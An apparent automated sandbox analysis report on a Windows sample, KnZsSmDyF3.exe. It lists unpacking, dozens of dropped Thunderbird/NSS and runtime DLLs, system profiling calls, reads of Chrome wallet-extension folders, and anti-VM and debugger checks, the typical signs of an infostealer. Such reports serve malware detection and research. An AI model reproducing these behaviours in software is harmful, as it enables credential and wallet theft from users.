Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source:	Binary string: C:\xiyo\pawiyafa kezig\bokinecabigu\xoze\32\bezunu.pdb source: KnZsSmDyF3.exe
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Unpacked PE file: 1.2.KnZsSmDyF3.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Unpacked PE file: 1.2.KnZsSmDyF3.exe.400000.0.unpack

Source: ucrtbase.dll.1.dr

Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: 1_2_004317EF LoadLibraryA,GetProcAddress,FreeLibrary,

1_2_004317EF

Source: sqlite3.dll.1.dr	Static PE information: section name: /4
Source: sqlite3.dll.1.dr	Static PE information: section name: /19
Source: sqlite3.dll.1.dr	Static PE information: section name: /31
Source: sqlite3.dll.1.dr	Static PE information: section name: /45
Source: sqlite3.dll.1.dr	Static PE information: section name: /57
Source: sqlite3.dll.1.dr	Static PE information: section name: /70
Source: sqlite3.dll.1.dr	Static PE information: section name: /81
Source: sqlite3.dll.1.dr	Static PE information: section name: /92
Source: AccessibleHandler.dll.1.dr	Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.1.dr	Static PE information: section name: .orpc
Source: IA2Marshal.dll.1.dr	Static PE information: section name: .orpc
Source: lgpllibs.dll.1.dr	Static PE information: section name: .rodata
Source: MapiProxy.dll.1.dr	Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.1.dr	Static PE information: section name: .orpc
Source: mozglue.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0046C54A pushad ; retf		1_2_0046C701
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0046C702 pushad ; retf		1_2_0046C701

Source: initial sample

Static PE information: section name: .text entropy: 7.91913577979

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\prldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\ldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\AccessibleHandler.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\ldif60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File created: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: 1_2_0041DE02 __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_0041DE02

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\prldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\ldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\AccessibleHandler.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\ldif60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\breakpadinjector.dll	Jump to dropped file

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe TID: 3348

Thread sleep time: -150000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: 1_2_0043BDC7 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,

1_2_0043BDC7

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: 1_2_004329F2 __EH_prolog,GetLogicalDriveStringsA,

1_2_004329F2

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: 1_2_0043454E __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,

1_2_0043454E

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior

Source: KnZsSmDyF3.exe, 00000001.00000002.220638860.000000004BA70000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: KnZsSmDyF3.exe, 00000001.00000002.220638860.000000004BA70000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: KnZsSmDyF3.exe, 00000001.00000002.219771194.0000000000D36000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWP>
Source: KnZsSmDyF3.exe, 00000001.00000002.220638860.000000004BA70000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: KnZsSmDyF3.exe, 00000001.00000002.220638860.000000004BA70000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: 1_2_0043E087 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_0043E087

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: 1_2_004317EF LoadLibraryA,GetProcAddress,FreeLibrary,

1_2_004317EF

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: 1_2_004448BD mov eax, dword ptr fs:[00000030h]

1_2_004448BD

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: 1_2_0040C332 __EH_prolog,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

1_2_0040C332

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0043E087 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0043E087
